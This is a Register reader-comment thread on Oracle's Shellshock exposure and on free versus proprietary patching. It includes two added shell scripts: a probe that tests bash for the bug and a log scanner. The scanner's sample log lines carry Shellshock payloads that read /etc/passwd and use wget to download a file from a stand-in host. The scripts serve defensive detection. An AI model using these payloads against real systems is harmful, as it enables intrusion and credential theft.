Oracle SHELLSHOCKER - data titan lists unpatchables

Oracle has confirmed that at least 32 of its products are affected by the vulnerability recently discovered in the Bash command-line interpreter – aka the "Shellshock" bug – including some of the company's pricey integrated hardware systems. The database giant issued a security alert regarding the issue on Friday, warning that …

  1. Anonymous Coward

    Free software solves all problems ever

    "Free Software Foundation executive director John Sullivan attributed the speedy resolution of the Shellshock issue to the fact that Bash is free software, adding that proprietary software often ships with hidden bugs that customers cannot fix by themselves."

    Why yes, indeed! Because Bash is free software, I was able to immediately fix all the embedded devices I have that incorporate it.

    1. Graham Dawson Silver badge

      Re: Free software solves all problems ever

      You realise those embedded devices will use busybox, yes? And that busybox isn't vulnerable to this?

      Try again.

    2. Flocke Kroes Silver badge

      Do your research before you buy

      Firstly - do you actually have an embedded device with bash installed? Bash is big, and if embedded devices have a shell at all it is usually one of the mini ones like lash which is not vulnerable to this flaw.

      Secondly, pretend a flaw is found in lash tomorrow, and you have a device for which you cannot download the source code, apply a patch, cross compile and install new firmware. <shouting>Why did you buy it?</shouting>. There are plenty of hackable devices out there. If you want a router, pick one that is easy to install openwrt on. The reason locked down devices exist at all is because people buy them. Stop it at once, or you have to pay whatever the vendor demands for updates.

    3. Hargrove

      Re: Free software solves all problems ever

      No vote up or down, but a general observation on the El Reg scene. Sarcasm and irony don't appear to translate well. (I'm making an assumption, here, which as we all know . . . )

      Assuming AC was being sarcastic, I suspect that the response is associated with whatever gene predisposes IT specialists, when confronted by some monumental SNAFU in a program's operation, to respond, "Yes, it does that."

    4. danny_0x98

      Re: Free software solves all problems ever

      You were right to latch onto Mr. Sullivan's quote, but I think you missed the real issues. This problem wasn't quick to fix because bash is free, it was quick to fix because once shown the issue the bash maintainers could address it rapidly. That any one may contribute compounds the issue of quality control. Fortunately, as a practical matter, it's generally project code base experts who would bother.

      However, that only fixes the source code. Because the software is free and as is, the users are on their own as to whether a fix of one thing breaks another in their confederation of packages.

      Proprietary code vendors do not do the work of angels, but the biggest ones such as Apple, Oracle, Microsoft, etc., generally think about the effects of the fix on the paying customer, and if there's a show-stopper problem, hold off until the patch does no harm to the software they sell. This takes time, both in the testing and the revising. Apple and Microsoft recently put out patches that had to be withdrawn. Incompetence? Maybe. Shipping more quickly than they should? Definitely.

      Quick is not the virtue, correct is. Mr. Sullivan should also remember that we users aren't grading on a curve. Many will be scrambling or vulnerable until the bash patches are installed and regressions addressed, and to them it doesn't matter that Microsoft will release patches in 10 days that it could have released last week, as bash is the thing that disrupted the schedule this week and possibly month. That the problem could have been fixed quickly raises the question why was it not fixed years sooner. And if the response is that the bash reliant aren't giving money to the project, would that be an eye-roller? I ask because right and maintained are why people give money to proprietary code vendors. To Mr. Sullivan I'd recommend coming down from the high horse because everyone has the same problems. Code is buggy and frequently one person's fix is another person's break. It takes time and money to get things right. A code license is not a silver bullet.

      1. Anonymous Coward

        Re: Free software solves all problems ever

        "Quick is not the virtue, correct is."

        But in a world where everyone wants everything yesterday, where by the time you find out about the bug, it's too late and you've already been pwned, you can't just do it fast, and you can't just do it right. You must be able to do it rightfast or you're toast.

    5. Anonymous Coward

      Re: Free software solves all problems ever

      "warning that many Oracle customers will have to wait awhile longer to receive patches."

      Service as usual then. Remind me why anyone sane would use Oracle products given a choice??

    6. Anonymous Coward

      Re: Free software solves all problems ever

      "attributed the speedy resolution of the Shellshock issue to the fact that Bash is free software"

      But it isn't fully fixed yet. And the partial patches that we have have been rushed out of the door without proper regression and integration testing.

      "the fact that Bash is free software, adding that proprietary software often ships with hidden bugs that customers cannot fix by themselves."

      So how come Microsoft - for instance - consistently has a faster average fix time / fewer days at risk than all of the major enterprise Linux distributions?

  2. Lostintranslation

    "Oracle doesn't plan to send notices to individual customers when new fixes become available, so customers are advised to keep checking the relevant security alert page for updates."

    That is absolutely shocking, and reason enough to find an alternative supplier when the time comes.

    1. Anonymous Coward

      Come on, it's free software!

      I mean, if you were made to pay lots for support, and the company was somehow able to create a database of customers and the products they have on support, then maybe they could just manage to email folk to let them know. But that would cost money.

      Oh wait...

      1. Mark #255

        somehow able to create a database of customers...

        But where on earth would Oracle get such a complex program, this "data-base" of which you speak, from?

        And surely it would require an unprecedented level of foresight to allow a company to contact its paying customers over such a newly discovered class of issue (I mean, bugs only gained their name in the forties).

        No, Mr (or Ms) Coward, I feel you are holding this poor, blameless company to altogether a too high standard.

    2. Joe 35

      Ridiculous kneejerk response. Like Microsoft, Apple, IBM and any other huge software vendor, they have millions of customers; it's wholly impractical at that scale to contact each and every customer. The back end support systems will anyway have details of, for example, the person in procurement who made the order years back, rather than an actual person responsible for bug fixes.

      They also all have systems that you can connect to which will tell you what needs an update for the actual software you have installed rather than what you bought (not the same thing at all), which any responsible IT organisation will be using and monitoring, rather than waiting passively for Oracle / IBM / SAP etc. to send an email to "fred@procurement dot com", who probably also buys software from every other vendor as well.

      1. JEDIDIAH

        What a maroon...

        Are you kidding? Anyone that's an Oracle customer has paid hefty coin for the privilege. That means that Oracle will certainly be able to contact all of them. If this were an issue of sending some sales centric spam, the question of "technologically feasible" would never even come up.

        For Oracle in particular, everyone in the trenches that can open a support ticket will have their own registered account with Oracle tied to their corporate email account.

    3. razorfishsl

      If you have ever used Oracle products you will know customers get updates via the patch server and technet system.

      That is if you paid for the software and did not steal it.

  3. Flocke Kroes Silver badge

    Perhaps someone familiar with Oracle products can tell me...

    Are these 32 products with bash installed, or 32 products that I can remotely convince to run bash with my choice of data in an environment variable?

    At a brief glance, at least some of these products allow a competent sysadmin to download the source code for bash, apply a patch, compile and install a fixed version - all without any help from Oracle. Is this true of all 32?
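To make the question in the post above concrete: the Shellshock bug (CVE-2014-6271) is in how bash imports functions from its environment. On startup, a vulnerable bash treats any environment variable whose value begins with "() {" as a function definition and keeps parsing past the closing brace, so anything appended after it is executed. That is what "remotely convince to run bash with my choice of data in an environment variable" means: a CGI handler or any other service that copies request data into the environment and then spawns bash. The check below is an added example, not code from the thread or from Oracle; it runs the widely published probe against a named bash binary and classifies the result. The function names shellshock_probe and classify_probe_output are this example's own.

```shell
#!/bin/sh
# Added example: probe a bash binary for the Shellshock function-import bug.
# Function names are this example's own, not from bash or from Oracle.

# Classify the stdout of the probe command.
#   prints "vulnerable" and returns 1 if the trailing command ran,
#   prints "patched"    and returns 0 if only the -c command ran,
#   prints "unknown"    and returns 2 otherwise (binary missing, odd output).
classify_probe_output() {
  case "$1" in
    *SHELLSHOCK_MARKER*) echo vulnerable; return 1 ;;
    *probe_ok*)          echo patched;    return 0 ;;
    *)                   echo unknown;    return 2 ;;
  esac
}

# Run the classic probe against the bash named in $1 (default: bash in PATH).
# The variable's value looks like an exported function ("() { :;}") followed
# by a trailing command. A vulnerable bash executes the trailing command while
# importing the function; a patched bash ignores the variable (some patched
# builds print a warning on stderr, which is discarded here).
shellshock_probe() {
  probe_bin="${1:-bash}"
  command -v "$probe_bin" >/dev/null 2>&1 || { echo unknown; return 2; }
  probe_out=$(env x='() { :;}; echo SHELLSHOCK_MARKER' \
              "$probe_bin" -c 'echo probe_ok' 2>/dev/null)
  classify_probe_output "$probe_out"
}

# Stand-alone usage: sh shellshock_check.sh /path/to/bash
# (exit status mirrors the classification: 0 patched, 1 vulnerable, 2 unknown)
if [ $# -gt 0 ]; then
  shellshock_probe "$1"
fi
```

Run it against every bash on the box, not just the one in PATH: appliances and bundled stacks often carry their own copy, which is exactly the case the post is asking about. A "patched" result from this probe only covers the original bug; later bash patches closed further parser issues in the same code path, so the version string still matters.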

    1. Anonymous Coward

      Re: Perhaps someone familiar with Oracle products can tell me...

      Even if they can, my guess is they won't. Given what enterprises pay for Oracle and the likelihood that manually fixing a small part of something yourself will invalidate the support agreement I suspect competent sysadmins leave these things alone and let whoever bought Oracle take the flak if problems come up.

      1. igavus

        Re: Perhaps someone familiar with Oracle products can tell me...

        Well, the flak won't ever come to the persons who bought Oracle - they're much too high up in the chain for that. The competent sysadmins meanwhile will mitigate the issue via other means and wait for the vendor supplied fixes to arrive.

    2. Anonymous Coward

      Re: Perhaps someone familiar with Oracle products can tell me...

      Yes to the majority of the affected products, and some of the exploits make it nearly impossible to know if the systems have been 'root kitted' without a full binary audit from a trusted source, or leaked information somewhere.

      And what's worse is the outages that will be inflicted on businesses and services over the next few weeks / months / years to remediate the affected products with a new version of BASH.

      Just to note the impact of ShellShock, From the Oracle security bulletin :

      Solaris 8, 9, 10: BASH is not the root shell but is available to users, applications, etc. for use. Any service running under BASH or CGI script may be exploitable. As a minimum, a service / application, etc. restart would be required after the patches are applied / tested.

      Solaris 11: BASH is the root shell and is also available to users, applications, etc. for use. Any service running under BASH or CGI script may be exploitable. As a minimum, a system reboot would be required after the patches are applied / tested.

      Oracle LINUX: same restrictions as RedHat, reboot, etc.

      ILOMs & XSCF: firmware upgrade, and hope not to lose the configs. Both have web interfaces.

      Oracle VM 2.2, 3.2, 3.3: reboot of all your LDOMs after patches are applied / tested.

      The CISCO rebadged fibre channel switches may need a reboot, outage affecting all connected fibres / systems / etc.

      I'm surprised that they haven't listed Oracle Enterprise Manager as yet considering its 'heavy' web interface along with its use of shell / Java scripts.
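The list above has one exposure in common: a web interface or CGI script that hands attacker-controlled request headers to a bash child process. Those same headers end up in the access log, so while waiting for vendor firmware the attempts are at least easy to spot. The scan below is an added example, not from the thread or from any Oracle bulletin; it looks for the "() {" function-definition prefix in Apache-style combined log lines, whichever quoted field carried it, and reports the lines and source addresses. The four log lines are constructed for the example using RFC 5737 documentation addresses, and the function names are this example's own.

```shell
#!/bin/sh
# Added example: find Shellshock attempts in web-server access logs.
# The log lines below are constructed for this example (RFC 5737 test
# addresses); the function names are this example's own.

sample_log() {
cat <<'EOF'
203.0.113.5 - - [26/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'cat /etc/passwd'"
198.51.100.7 - - [26/Sep/2014:10:01:09 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.5 - - [26/Sep/2014:10:02:30 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 512 "() { :; }; /usr/bin/wget http://203.0.113.5/x -O /tmp/x" "-"
192.0.2.44 - - [26/Sep/2014:10:03:11 +0000] "GET /cgi-bin/status.cgi?q=%28%29+%7B HTTP/1.1" 200 512 "-" "curl/7.30.0"
EOF
}

# Signature: literal "()" then optional whitespace then "{". Bash only treats
# an environment variable as an importable function when its value starts
# this way, so the prefix is the marker of an attempt regardless of which
# header (User-Agent, Referer, Cookie, ...) carried it. The fourth sample line
# is URL-encoded; it does not match, and it is not decoded into the CGI
# environment by the server either, so it is not a working attempt.
SHELLSHOCK_RE='\(\)[[:space:]]*[{]'

# Print the matching lines from stdin.
shellshock_lines() {
  grep -E "$SHELLSHOCK_RE"
}

# Count matching lines from stdin (prints 0 when there are none).
shellshock_count() {
  n=$(grep -c -E "$SHELLSHOCK_RE" || true)
  echo "${n:-0}"
}

# Source addresses that sent an attempt, one per line, de-duplicated.
shellshock_sources() {
  shellshock_lines | awk '{print $1}' | sort -u
}

# Stand-alone usage: sh shellshock_log_scan.sh /var/log/httpd/access_log
if [ $# -gt 0 ]; then
  shellshock_sources < "$1"
fi
```

A hit in the log does not mean the request succeeded; cross-check against whether the target path actually runs a CGI that spawns bash on that host, and treat the source addresses as a starting list for the "has it been rootkitted" question the commenter raises rather than as proof either way.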

  4. Real Ale is Best

    What else?

    I can see that after openssl and now bash, lots of open source tools whose code has not been looked at for decades because they have, up to now, just worked, will come under intense scrutiny.

    Expect many more of these issues to surface.

    1. Roo

      Re: What else?

      "I can see that after openssl and now bash, lots of open source tools whose code has not been looked at for decades because they have, up to now, just worked, will come under intense scrutiny."

      That's no bad thing IMO, but this process isn't a new event in the Open Source world either.

    2. Anonymous Coward

      Re: What else?

      "Expect many more of these issues to surface."

      Yep - Java will probably be next. Oh, wait....

  5. Anonymous Coward

    Speedy resolution?

    It took three days for a definitive (we hope) patch since the disclosure. While the vulnerable code has been there for a very long time, and nobody ever spotted it, despite source code availability.

    And unlike in 1970, most users can't fix bugs themselves for the simple reason they are not programmers, and they do expect the supplier to fix them, open source or not.

    But we see the FSF is asking money for support... not more 'community' source code reviews...

  6. l8rm8e

    Bash bug zappa!

    Bash source code is as obscure as a Zappa reference, and thus, safe from regular day to day attacks from the central scrutinizer, thrust forth in tiny paragraphs.

  7. Dan 55 Silver badge

    Proprietary software vendors - what do they do?

    - Build a system using other people's work or more likely outdated versions of other people's work

    - Take customers' money

    - Take an inordinate amount of time to push out security updates but only to customers who've paid more for support

    That's adding value right there.

    1. Nuno trancoso

      Re: Proprietary software vendors - what do they do?

      Non free *nix distros - what do they do?

      - Build a system using other people's work or more likely outdated versions of other people's work. Or sometimes cutting edge that doesn't really work all that well or hasn't been extensively tested.

      - Take customers' money

      - Take whatever time it takes and push updates as you feel like. Answer the phone if the sucker, I mean customer, actually has a support contract.

      That's adding value right there too.

      That said, I'm a Slack fan and will die one, but I see no difference between Proprietary and Enterprise *nix. Same poopoo, different smell. And source availability is only meaningful if you have the in house expertise to fix/apply it yourself, whether the FOSS people like to admit it or not.

      1. Arion

        Re: Proprietary software vendors - what do they do?

        source availability is only meaningful if you _or_anyone_else_ has the in house expertise to fix/apply it yourself,

        Fixed that for you

        1. JEDIDIAH

          Re: Proprietary software vendors - what do they do?

          In a large corporation, the likelihood of that is going to be very high actually.

          I worked in one Fortune 500 company where they plain had the source for their key enterprise application. They had been maintaining it themselves because it was impossible to replace and would have been desupported by the vendor decades ago.

          A megacorp being able to handle the source to bash is not such a strange idea.

  8. Anonymous Coward

    New patch out

    I looked this morning, there is another patch out in the bash directory released late last night (for GMT users) - e.g. for 4.3 patch 027 is out:

    http://ftp.gnu.org/gnu/bash/bash-4.3-patches/

    1. Anonymous Coward

      Re: New patch out

      "there is another patch out in the bash directory "

      Like trying to fix the Titanic with Elastoplast....
